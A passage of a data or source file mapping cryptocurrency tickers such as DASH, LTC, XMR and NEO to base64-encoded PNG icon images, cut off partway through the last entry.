'DASH': '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',
'LTC': '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',
'MIOTA': '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',
'XMR': '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',
'NEO': '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',
'XEM': 'iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAAXNSR0IArs4c6QAAACBjSFJNAAB6JgAAgIQAAPoAAACA6AAAdTAAAOpgAAA6mAAAF3CculE8AAAACXBIWXMAABYlAAAWJQFJUiTwAAABWWlUWHRYTUw6Y29tLmFkb2JlLnhtcAAAAAAAPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iWE1QIENvcmUgNS40LjAiPgogICA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPgogICAgICA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIgogICAgICAgICAgICB4bWxuczp0aWZmPSJodHRwOi8vbnMuYWRvYmUuY29tL3RpZmYvMS4wLyI+CiAgICAgICAgIDx0aWZmOk9yaWVudGF0aW9uPjE8L3RpZmY6T3JpZW50YXRpb24+CiAgICAgIDwvcmRmOkRlc2NyaXB0aW9uPgogICA8L3JkZjpSREY+CjwveDp4bXBtZXRhPgpMwidZAAAIfUlEQVRYCbVWCWxU1xU97/8/Mx6PB6+DN4yNNxbTspRAMOBMQ2gSUqoQYqctQkioRU2pVFQpiYoS4TZto1SNFEJKBCKhjVICmGD2hASo2aGmNotjsAFjjws2XvHYM/bMX17v+7anY4NjWqlXevP/f+++e8+59777BhhdGKnIbkAZXXWIxuAeacjssA9h/GEi5sVGTsMIV/jwVTgPV0S7PB4lvqULToPLlqgIGPGxvDc5Qe8YP1ZtcU7svl9cDC18n5sIlPXbGmJvOABGijIphjavfSEh+d090hwAcwE2m55ZhCuBhiUjHopF4fB2M9zzC6AS7YvyIimycXJUb6Wq4pwjc/K5S8f3VzPGBBkhMo0QsXAAgrGJ7s/FiHp7Y/xST7vyAukWzJvC4xbO1jEjW8XYeA0Oh45Im4EIhXOJLAR0Dk2PZAHDiXpPE0p3AtsqgWwy2ETLPqAyETiY9exLO85+vvMWTQsx/Q0CMD+enjsm7lqt5Seednl1ZhKy1ixTkf/tXuSkBo2YaMOQJQh9ycRPHDgHMwiybHXA7/fhRDl4uf819KY/yTHGZTBJZgGfV26tr0HN0RJUnDrij